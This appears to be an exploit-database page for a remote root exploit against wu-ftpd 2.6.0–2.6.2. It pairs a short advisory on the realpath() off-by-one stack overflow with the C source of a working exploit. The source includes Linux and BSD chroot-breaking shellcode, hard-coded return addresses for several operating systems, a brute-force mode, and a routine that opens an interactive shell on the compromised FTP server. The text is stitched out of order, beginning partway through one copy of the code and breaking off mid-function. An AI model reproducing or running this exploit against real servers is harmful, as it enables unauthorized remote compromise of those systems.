        memset((char *)get_nm,(NRL),sizeof(get_nm));
        recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

        if(type) /* MKD command */
        {
                if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
                {
                        fprintf(stdout," [-] MKD &shellcode_dir failed.\n\n");
                        exit(FAD);
                }
                else fprintf(stdout," [+] Ok, MKD &shellcode_dir.\n");
        }
        else /* RMD command */
        {
                if(!strstr(get_nm,(CWD_COMM_SCS)))
                {
                        fprintf(stdout," [-] RMD &shellcode_dir failed.\n\n");
                        exit(FAD);
                }
                else fprintf(stdout," [+] Ok, RMD &shellcode_dir.\n");
        }
        return;
}

int main(int argc,char *argv[])
{
        int opt_g,sock,__bf=(NRL);
        int mx_bf=(MAX_BF),bf_lsz=(BF_LSZ);
        char user_id[(DEF_VA)]=(DEF_STR);
        char pass_wd[(DEF_VA)]=(DEF_STR);
        char tg_host[(DEF_VA)]=(DEF_HOST);
        int tg_port=(DEF_PORT);
        u_long sh_addr=(plat[t_g].sh_addr);

        (void)banrl();
        while((opt_g=getopt(argc,argv,"M:m:H:h:U:u:P:p:N:n:S:s:T:t:BbIi"))!=EOF)
        {
                extern char *optarg;
                switch(opt_g)
                {
                        case 'M':
                        case 'm':
                                mx_bf=(atoi(optarg));
                                bf_lsz=((0x1000)/mx_bf);
                                break;

                        case 'H':
                        case 'h':
                                memset((char *)tg_host,(NRL),sizeof(tg_host));
                                strncpy(tg_host,optarg,sizeof(tg_host)-1);
                                break;

                        case 'U':
                        case 'u':
                                memset((char *)user_id,(NRL),sizeof(user_id));
                                strncpy(user_id,optarg,sizeof(user_id)-1);
                                break;

                        case 'P':
                        case 'p':
                                memset((char *)pass_wd,(NRL),sizeof(pass_wd));
                                strncpy(pass_wd,optarg,sizeof(pass_wd)-1);
                                break;

                        case 'N':
                        case 'n':
                                tg_port=(atoi(optarg));
                                break;

                        case 'S':
                        case 's':
                                sh_addr=strtoul(optarg,(NRL),(NRL));
                                break;

                        case 'T':
                        case 't':
                                if((t_g=(atoi(optarg)))<(3))
                                        sh_addr=(plat[t_g].sh_addr);
                                else (void)prcode_usage(argv[(NRL)]);
                                break;

                        case 'B':
                        case 'b':
                                __bf=(SCS);
                                break;

                        case 'I':
                        case 'i':
                                (void)prcode_usage(argv[(NRL)]);
                                break;

                        case '?':
                                (void)prcode_usage(argv[(NRL)]);
                                break;
                }
        }
        if(!strcmp(user_id,(DEF_STR))||!strcmp(pass_wd,(DEF_STR)))
                (void)prcode_usage(argv[(NRL)]);

        memset((char *)home_dir,(NRL),sizeof(home_dir));
        snprintf(home_dir,sizeof(home_dir)-1,"%s%s",(HOME_DIR),user_id);

        if(!__bf)
        {
                fprintf(stdout," [*] Target: %s.\n",(plat[t_g].v_nm));
                fprintf(stdout," [+] address: %p.\n",sh_addr);
                fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
                fflush(stdout);

                sock=(int)setsock(tg_host,tg_port);
                (void)re_connt(sock);
                fprintf(stdout," [  OK  ]\n");

                fprintf(stdout," [1] ftpd connection login.\n");
                (void)ftpd_login(sock,user_id,pass_wd);

                fprintf(stdout," [2] send exploit code.\n");
                (void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
                close(sock);

                fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
                fflush(stdout);

                sock=(int)setsock(tg_host,tg_port);
                (void)re_connt(sock);
                fprintf(stdout," [  OK  ]\n");

                fprintf(stdout," [3] ftpd connection login.\n");
                (void)ftpd_login(sock,user_id,pass_wd);

                fprintf(stdout," [4] send exploit code.\n");
                (void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

                fprintf(stdout," [5] Waiting, execute the shell ");
                fflush(stdout);
                (u_int)sleep(SCS);

                fprintf(stdout,".");
                fflush(stdout);
                (u_int)sleep(SCS);

                fprintf(stdout,".");
                fflush(stdout);
                (u_int)sleep(SCS);

                fprintf(stdout,".\n");
                (void)conn_shell(sock);
                close(sock);
        }
        else
        {
                int bt_num=(NRL);
                t_g=(4);
                sh_addr=(plat[t_g].sh_addr);
                fprintf(stdout," [*] Brute-Force mode.\n");
                fprintf(stdout," [+] BF Count: %d.\n",mx_bf);
                fprintf(stdout," [+] BF Size: +%d.\n\n",bf_lsz);

                for(bt_num=(NRL);bt_num<(mx_bf);bt_num++)
                {
                        sh_addr=(u_long)null_chk(sh_addr);
                        fprintf(stdout," [+] Brute-Force address: %p.\n",sh_addr);
                        fprintf(stdout," [*] #1 Try, %s:%d ...",tg_host,tg_port);
                        fflush(stdout);

                        sock=(int)setsock(tg_host,tg_port);
                        (void)re_connt(sock);
                        fprintf(stdout," [  OK  ]\n");

                        fprintf(stdout," [1] ftpd connection login.\n");
                        (void)ftpd_login(sock,user_id,pass_wd);

                        fprintf(stdout," [2] send exploit code.\n");
                        if(bt_num==(NRL))
                        {
                                (void)make_send_exploit(sock,(SCS),sh_addr,(SCS));
                        }
                        else
                        {
                                (void)make_send_exploit(sock,(SCS),sh_addr,(NRL));
                        }
                        close(sock);

                        fprintf(stdout," [+] #2 Try, %s:%d ...",tg_host,tg_port);
                        fflush(stdout);

                        sock=(int)setsock(tg_host,tg_port);
                        (void)re_connt(sock);
                        fprintf(stdout," [  OK  ]\n");

                        fprintf(stdout," [3] ftpd connection login.\n");
                        (void)ftpd_login(sock,user_id,pass_wd);

                        fprintf(stdout," [4] send exploit code.\n");
                        (void)make_send_exploit(sock,(NRL),sh_addr,(NRL));

                        fprintf(stdout," [5] Waiting, execute the shell ");
                        fflush(stdout);
                        (u_int)sleep(SCS);

                        fprintf(stdout,".");
                        fflush(stdout);
                        (u_int)sleep(SCS);

                        fprintf(stdout,".");
                        fflush(stdout);
                        (u_int)sleep(SCS);

                        fprintf(stdout,".\n");
                        (void)conn_shell(sock);
                        close(sock);

                        sh_addr+=(bf_lsz);
                }
        }
        exit(NRL);
}

int setsock(char *u_host,int u_port)
{
        int sock;
        struct hostent *sxp;
        struct sockaddr_in sxp_addr;

        if((sxp=gethostbyname(u_host))==(GET_HOST_NM_ERR))
        {
                return(FAD);
        }
        if((sock=socket(AF_INET,SOCK_STREAM,(NRL)))==(FAD))
        {
                return(FAD);
        }
        sxp_addr.sin_family=AF_INET;
        sxp_addr.sin_port=htons(u_port);
        sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
        bzero(&(sxp_addr.sin_zero),(SIN_ZR_SIZE));

        if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==(FAD))
        {
                return(FAD);
        }
        return(sock);
}

void conn_shell(int conn_sock)
{
        int died;
        int ex_t=(NRL);
        char *command=(DEF_COMM);
        char readbuf[(GET_R)];
        fd_set rset;

        memset((char *)readbuf,(NRL),sizeof(readbuf));
        fprintf(stdout," [*] Send, command packet !\n\n");
        send(conn_sock,command,strlen(command),(NRL));

        for(;;)
        {
                fflush(stdout);
                FD_ZERO(&rset);
                FD_SET(conn_sock,&rset);
                FD_SET(STDIN_FILENO,&rset);
                select(conn_sock+1,&rset,NULL,NULL,NULL);

                if(FD_ISSET(conn_sock,&rset))
                {
                        died=read(conn_sock,readbuf,sizeof(readbuf)-1);
                        if(died<=(NRL))
                        {
                                if(!ex_t)
                                        return;
                                else
                                        exit(NRL);
                        }
                        readbuf[died]=(NRL);
                        fprintf(stdout,"%s",readbuf);
                }
                if(FD_ISSET(STDIN_FILENO,&rset))
                {
                        died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
                        if(died>(NRL))
                        {
                                readbuf[died]=(NRL);
                                if(strstr(readbuf,"exit"))
                                        ex_t=(SCS);
                                write(conn_sock,readbuf,died);
                        }
                }
        }
        return;
}

void re_connt(int st_sock_va)
{
        if(st_sock_va==(FAD))
        {
                fprintf(stdout," [ Fail ]\n\n");
                exit(FAD);
        }
}

void banrl()
{
        fprintf(stdout,"\n 0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.\n\n");
}

/* eoc */		

- 漏洞信息 (22975)

wu-ftpd 2.6.2, 2.6.0, 2.6.1 realpath() Off-By-One Buffer Overflow Vulnerability (EDBID:22975)
unix remote
2003-08-06 Verified
0 Xpl017Elz
N/A [点击下载]
source: http://www.securityfocus.com/bid/8315/info
 
The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has lead to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack- buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable.
 
Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions.
 
NOTE: Patching the C library alone may not remove all instances of this vulnerability. Statically linked programs may need to be rebuilt with a patched version of the C library. Also, some applications may implement their own version of 'realpath()'. These applications would require their own patches. FreeBSD has published a large list of applications that use 'realpath()'. Administrators of FreeBSD and other systems are urged to review it. For more information, see the advisory 'FreeBSD-SA-03:08.realpath'.

/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
** 
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
**
** Update: 
** [v0.0.2] August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
** [v0.0.3] August 3, Brute-Force function addition.
** [v0.0.4] August 4, Added FreeBSD, OpenBSD version wu-ftpd-2.6.x exploit.
** It will be applied well to most XxxxBSD.
** [v0.0.5] August 4, Remote scan & exploit test function addition.
** August 6, Cleaning.
**
*/

#define VERSION "v0.0.5"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100) /* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH_LINUX 15
#define DEF_ANSH_FRBSD 55
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR_LINUX "/home/"
#define HOME_DIR_FRBSD "/usr/home/"
#define HOME_DIR_OPBSD "/home/"
#define DEF_HOST "localhost"
#define DEF_COMM "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec bash -i\n"
#define DEF_COMM_OB "echo \"x82 is happy, x82 is happy, x82 is happy\";" \
"uname -a;id;export TERM=vt100;exec sh -i\n"
/* ftpd handshake */
#define FTP_CONN_SCS "220"
#define FTP_USER_FAD "331"
#define FTP_LOGIN_FAD "530 Login incorrect."
#define FTP_LOGIN_SCS "230"
#define CWD_COMM_SCS "250" /* also, RMD command */
#define MKD_COMM_SCS "257"
#define MKD_EXIST "521"
#define CMD_ERROR "500"

void ftpd_login(int sock,char *user,char *pass);
void conn_shell(int conn_sock,u_long scs_addr);
int setsock(char *u_host,int u_port);
void re_connt(int st_sock_va);
void prcode_usage(char *f_nm);
int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character);
int send_shellcode(int sock,int type,char *dir_nm);
void make_send_exploit(int sock,int type,u_long sh_addr,int d_type);
int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr);
u_long null_chk(u_long sh_addr);
void banrl();
int bscann(char *chk_ban);
int check_exp(int sock);

struct os
{
	int num;
	char *v_nm;
	u_long sh_addr;
	u_long bf_addr;
	char *shellcode;
	int off_st;
	char *home;
};
int t_g=(NRL);
char home_dir[(DEF_VA)]; /* user home directory offset */
int __exp_test=(NRL); /* check exploit test */
int b_scan=(NRL); /* banner check */
/*
** `0xff' uses two times to be realized in our shellcode.
*/
char lnx_shellcode_ffx2[]=
	/* setuid/chroot-break/execve shellcode by Lam3rZ */
	"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb\x43\x89"
	"\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31\xc9\x8d\x5e\x01"
	"\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27\xcd\x80\x31\xc0\x8d\x5e\x01"
	"\xb0\x3d\xcd\x80\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9"
	"\xfe\xc9\x31\xc0\x8d\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31"
	"\xc0\x88\x46\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe"
	"\xc8\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
	"\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0"
"\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30\x73\x68\x31"
	"\x2e\x2e\x31\x31";

char bsd_shellcode_ffx2[]=
	/* Lam3rZ chroot() code rewritten for FreeBSD by venglin */
	"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
	"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
	"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0\x88"
	"\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80\x31"
	"\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31"
	"\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75\xf1"
	"\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd\x80"
	"\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46\x07"
	"\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
	"\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53\x53"
	"\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x30\x62\x69\x6e\x30"
	"\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e\x67\x6c\x69\x6e"
	"\x40\x6b\x6f\x63\x68\x61\x6d\x2e\x6b\x61\x73\x69\x65\x2e"
	"\x63\x6f\x6d";

struct os plat[]=
{
	/*
	** I enjoy version up, will not share more. :-}
	*/
	{
	0,"RedHat Linux 6.x Version wu-2.6.0 compile",0x0806a59c,
	0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
	1,"RedHat Linux 6.x Version wu-2.6.1 compile",0x0806aad8,
	0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
	2,"RedHat Linux 6.x Version wu-2.6.2 compile",0x0806aa60,
	0x0806a082,lnx_shellcode_ffx2,(DEF_ANSH_LINUX),(HOME_DIR_LINUX)
	},
	{
	3,"FreeBSD 4.6.2-RELEASE Version wu-2.6.0 compile",0x0806b826,
	0x0806b026,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
	4,"FreeBSD 4.6.2-RELEASE Version wu-2.6.1 compile",0x0806cb36,
	0x0806c036,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
	5,"FreeBSD 4.6.2-RELEASE Version wu-2.6.2 compile",0x0806ccaa,
	0x0806c082,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_FRBSD)
	},
	{
	6,"OpenBSD 3.0 Version wu-2.6.0 compile",0xdfbfc8f8,
	0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
	7,"OpenBSD 3.0 Version wu-2.6.1 compile",0xdfbfc8f8,
	0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
	8,"OpenBSD 3.0 Version wu-2.6.2 compile",0xdfbfc8f8,
	0xdfbfc0f8,bsd_shellcode_ffx2,(DEF_ANSH_FRBSD),(HOME_DIR_OPBSD)
	},
	{
	0x82,NULL,0x0,0x0,NULL,0,NULL
	}
};

void prcode_usage(char *f_nm)
{
	int r_n=(NRL);
	fprintf(stdout," Usage: %s -options arguments\n\n",f_nm);
	fprintf(stdout," \t-h [hostname] : Target hostname & ip.\n");
	fprintf(stdout," \t-u [userid] : User id.\n");
	fprintf(stdout," \t-p [passwd] : User password.\n");
	fprintf(stdout," \t-n [port num] : Target port number.\n");
	fprintf(stdout," \t-s [shelladdr] : Shellcode address.\n");
	fprintf(stdout," \t-m [max num] : Brute-Force Count number.\n");
	fprintf(stdout," \t-i : help information.\n");
	fprintf(stdout," \t-q : banner scan mode.\n");
	fprintf(stdout," \t-c : check exploit test.\n");
	fprintf(stdout," \t-t [target num] : Select target number.\n");
	fprintf(stdout," \t-b [target num] : Brute-Force mode. (Select target number)\n\n");
	for(r_n=(NRL);plat[r_n].v_nm!=(NULL);r_n++)
	{
		fprintf(stdout," \t\t{%d} %s.\n",(plat[r_n].num),(plat[r_n].v_nm));
	}
	fprintf(stdout,"\n Example1: %s -hlocalhost -ux82 -px82 -n21 -t0",f_nm);
	fprintf(stdout,"\n Example2: %s -hwu_sub -ux82 -px82 -n21 -b0",f_nm);
	fprintf(stdout,"\n Example3: %s -h0 -ux82 -px82 -qc -t0\n\n",f_nm);
	exit(FAD);
}

u_long null_chk(u_long sh_addr)
{
	int chk_0x2f=(NRL);
	for(chk_0x2f=(NRL);chk_0x2f<0x20;chk_0x2f+=(DEF_ALIGN*2))
	{
		if((sh_addr>>(chk_0x2f)&0xff)==(0x2f))
		{
		fprintf(stderr," [-] slash was included to &shellcode address.\n\n");
		exit(FAD);
		}
	}
	if((sh_addr>>(NRL)&0xff)==(0x00))
	{
		return(sh_addr+=(SCS));
	}
	else return(sh_addr);
}

int bscann(char *chk_ban)
{
	fprintf(stdout,"\n [+] Checking, banner ...\n");
	if(strstr(chk_ban,"wu-2.6.0"))
	{
	fprintf(stdout," [*] [wu-ftpd-2.6.0]: This is version that exploit is possible.\n\n");
	return(SCS);
	}
	else if(strstr(chk_ban,"wu-2.6.1"))
	{
	fprintf(stdout," [*] [wu-ftpd-2.6.1]: This is version that exploit is possible.\n\n");
	return(SCS);
	}
	else if(strstr(chk_ban,"wu-2.6.2"))
	{
	fprintf(stdout," [*] [wu-ftpd-2.6.2]: This is version that exploit is possible.\n\n");
	return(SCS);
	}
	else
	{
	fprintf(stdout," [x] This version does not support exploit.\n");
	return(FAD);
	}
}

void ftpd_login(int sock,char *user,char *pass)
{
	char send_recv[(GET_R)];

	(u_int)sleep(SCS);
	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(b_scan)
	{
		b_scan=(NRL);
		if(((int)bscann(send_recv))==(FAD))
		{
			fprintf(stdout," [-] exploit stop.\n\n");
			exit(FAD);
		}
	}
	if(!strstr(send_recv,(FTP_CONN_SCS)))
	{
		fprintf(stdout," [-] ftpd connection failure.\n\n");
		close(sock);
		exit(FAD);
	}
	else fprintf(stdout," [*] ftpd connection success.\n");
	fprintf(stdout," [+] User id input.\n");

	memset((char *)send_recv,(NRL),sizeof(send_recv));
	snprintf(send_recv,sizeof(send_recv)-1,"USER %s\r\n",user);
	send(sock,send_recv,strlen(send_recv),(NRL));

	(u_int)sleep(SCS);
	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(!strstr(send_recv,(FTP_USER_FAD)))
	{
		fprintf(stdout," [-] User id input failure.\n\n");
		close(sock);
		exit(FAD);
	}
	else fprintf(stdout," [+] User password input.\n");

	memset((char *)send_recv,(NRL),sizeof(send_recv));
	snprintf(send_recv,sizeof(send_recv)-1,"PASS %s\r\n",pass);
	send(sock,send_recv,strlen(send_recv),(NRL));

	(u_int)sleep(SCS);
	memset((char *)send_recv,(NRL),sizeof(send_recv));
	recv(sock,send_recv,sizeof(send_recv)-1,(NRL));

	if(strstr(send_recv,(FTP_LOGIN_FAD)))
	{
		fprintf(stdout," [-] FAILED LOGIN on %s.\n\n",user);
		close(sock);
		exit(FAD);
	}
	else if(strstr(send_recv,(FTP_LOGIN_SCS)))
	{
		fprintf(stdout," [*] User %s logged in.\n",user);
	}
	else
	{
		fprintf(stdout," [-] ftpd handshake failure.\n\n");
		close(sock);
		exit(FAD);
	}
	return;
}

int mkd_cwd_f(int sock,int type,char *dir_nm,int gb_character)
{
	int dr_n=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)dir_nm,(NRL),(GET_R));
	/* MKD command */
	dir_nm[cmd_f++]=(0x4d);
	dir_nm[cmd_f++]=(0x4b);
	dir_nm[cmd_f++]=(0x44);
	dir_nm[cmd_f++]=(0x20);

	for(dr_n=(cmd_f);dr_n<(DEF_VA)+(cmd_f);dr_n++)
	{
		dir_nm[dr_n]=(gb_character);
	}
	dir_nm[dr_n++]=(0x0d);
	dir_nm[dr_n++]=(0x0a);

	if(type)
	{
		send(sock,dir_nm,strlen(dir_nm),(NRL));
		(u_int)sleep(SCS);
		memset((char *)get_nm,(NRL),sizeof(get_nm));
		recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

	if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD command failed.\n\n");
			exit(FAD);
		}
	}
	/* CMD command */
	cmd_f=(NRL);
	dir_nm[cmd_f++]=(0x43);
	dir_nm[cmd_f++]=(0x57);
	dir_nm[cmd_f++]=(0x44);

	send(sock,dir_nm,strlen(dir_nm),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

	if(!strstr(get_nm,(CWD_COMM_SCS)))
	{
		fprintf(stdout," [-] CWD command failed.\n\n");
		exit(FAD);
	}
	return;
}

int send_shellcode(int sock,int type,char *dir_nm)
{
	int dr_n=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)dir_nm,(NRL),(GET_R));
	/* MKD command */
	dir_nm[cmd_f++]=(0x4d);
	dir_nm[cmd_f++]=(0x4b);
	dir_nm[cmd_f++]=(0x44);
	dir_nm[cmd_f++]=(0x20);
	
for(dr_n=(cmd_f);dr_n<(DEF_VA)+sizeof(0xffffffff)+(cmd_f)-strlen(plat
[t_g].shellcode);dr_n++)
	{
		dir_nm[dr_n]=(DEF_NOP);
	}
	for(cmd_f=(NRL);cmd_f<strlen(plat[t_g].shellcode);cmd_f++)
	{
		dir_nm[dr_n++]=plat[t_g].shellcode[cmd_f];
	}
	dir_nm[dr_n++]=(0x0d);
	dir_nm[dr_n++]=(0x0a);

	if(type)
	{
		send(sock,dir_nm,strlen(dir_nm),(NRL));
		(u_int)sleep(SCS);
		memset((char *)get_nm,(NRL),sizeof(get_nm));
		recv(sock,get_nm,sizeof(get_nm)-1,(NRL));

		if(!strstr(get_nm,(MKD_COMM_SCS))&&!strstr(get_nm,(MKD_EXIST)))
		{
			fprintf(stdout," [-] MKD shellcode_dir failed.\n\n");
			exit(FAD);
		}
	}
	/* CMD command */
	cmd_f=(NRL);
	dir_nm[cmd_f++]=(0x43);
	dir_nm[cmd_f++]=(0x57);
	dir_nm[cmd_f++]=(0x44);

	send(sock,dir_nm,strlen(dir_nm),(NRL));
	(u_int)sleep(SCS);
	memset((char *)get_nm,(NRL),sizeof(get_nm));
	recv(sock,get_nm,(GET_R)-1,(NRL));

	if(!strstr(get_nm,(CWD_COMM_SCS)))
	{
		fprintf(stdout," [-] CWD shellcode_dir failed.\n\n");
		exit(FAD);
	}
	return;
}

void make_send_exploit(int sock,int type,u_long sh_addr,int d_type)
{
	char atk_bf[(GET_R)];
	switch(t_g)
	{
		case 0:
		case 1:
		case 2:
		fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));	/* 01 */
		fprintf(stdout," [+] 02: make shell-code directory.\n");
		(int)send_shellcode(sock,d_type,(atk_bf));	/* 02 */
		fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));	/* 03 */
		fprintf(stdout," [+] 04: make 0x44444444 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x44));	/* 04 */
		fprintf(stdout," [+] 05: make 0x45454545 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x45));	/* 05 */
		fprintf(stdout," [+] 06: make 0x46464646 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x46));	/* 06 */
		fprintf(stdout," [+] 07: make 0x47474747 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x47));	/* 07 */
		fprintf(stdout," [+] 08: make 0x48484848 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x48));	/* 08 */
		fprintf(stdout," [+] 09: make 0x49494949 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x49));	/* 09 */
		fprintf(stdout," [+] 10: make 0x50505050 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x50));	/* 10 */
		fprintf(stdout," [+] 11: make 0x51515151 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x51));	/* 11 */
		fprintf(stdout," [+] 12: make 0x52525252 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x52));	/* 12 */
		fprintf(stdout," [+] 13: make 0x53535353 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x53));	/* 13 */
		fprintf(stdout," [+] 14: make 0x54545454 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x54));	/* 14 */
		fprintf(stdout," [+] 15: make 0x55555555 directory.\n");
		(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x55));	/* 15 */
		(int)make_retloc(sock,type,(atk_bf),sh_addr);	/* 16 */
		break;
		case 3:
		case 4:
		case 5:
		case 6:
		case 7:
		case 8:
			fprintf(stdout," [+] 01: make 0x41414141 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x41));	/* 01 */
			fprintf(stdout," [+] 02: make shell-code directory.\n");
			(int)send_shellcode(sock,d_type,(atk_bf));	/* 02 */
			fprintf(stdout," [+] 03: make 0x43434343 directory.\n");
			(int)mkd_cwd_f(sock,d_type,(atk_bf),(0x43));	/* 03 */
			(int)make_retloc(sock,type,(atk_bf),sh_addr);	/* 04 */
			break;
	}
	if(type&&__exp_test)
	{
		__exp_test=(NRL);
		if(((int)check_exp(sock))==(FAD))
		{
			fprintf(stderr," [-] This isn't vulnerable.\n\n");
			exit(FAD);
		}
	}
	return;
}

int make_retloc(int sock,int type,char *atk_bf,u_long sh_addr)
{
	int r_rn_1=(NRL),r_rn_2=(NRL),cmd_f=(NRL);
	char get_nm[(GET_R)];

	memset((char *)atk_bf,(NRL),(GET_R));
	if(type) /* MKD command */
	{
		atk_bf[cmd_f++]=(0x4d);
		atk_bf[cmd_f++]=(0x4b);
		atk_bf[cmd_f++]=(0x44);
		atk_bf[cmd_f++]=(0x20);
	}
	else /* RMD command */
	{
		atk_bf[cmd_f++]=(0x52);
		atk_bf[cmd_f++]=(0x4d);
		atk_bf[cmd_f++]=(0x44);
		atk_bf[cmd_f++]=(0x20);
	}
for(r_rn_1=(cmd_f),r_rn_2=(NRL);r_rn_2<(DEF_VA)-strlen(home_dir)-(plat[t_g].off_st);r_rn_2++)
		atk_bf[r_rn_1++]=(0x41);
	{
		int chk_0xff=(NRL);
		switch(t_g)
		{
			case 0:
			case 1:
			case 2:
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
			for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
					if((sh_addr>>(chk_0xff)&0xff)==(0xff))
						atk_bf[r_rn_1++]=0xff;
				atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
				break;
			case 3:
			case 4:
			case 5:
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
			for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
				if((sh_addr>>(chk_0xff)&0xff)==(0xff))
					atk_bf[r_rn_1++]=0xff;
				atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
			for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
				{
					atk_bf[r_rn_1++]=(0x41);
				}
				break;
			case 6:
			case 7:
			case 8:
			for(r_rn_2=(NRL);r_rn_2<(DEF_ALIGN*10);r_rn_2++)
				{
					atk_bf[r_rn_1++]=(0x41);
				}
				/* frame pointer */
				*(long *)&atk_bf[r_rn_1]=0x82828282;
				r_rn_1+=(DEF_ALIGN);
			for(chk_0xff=(NRL);chk_0xff<0x20;chk_0xff+=(DEF_ALIGN*2))
				{
					if((sh_addr>>(chk_0xff)&0xff)==(0xff))
						atk_bf[r_rn_1++]=0xff;
				atk_bf[r_rn_1++]=(sh_addr>>(chk_0xff)&0xff);
				}
				break;
		}
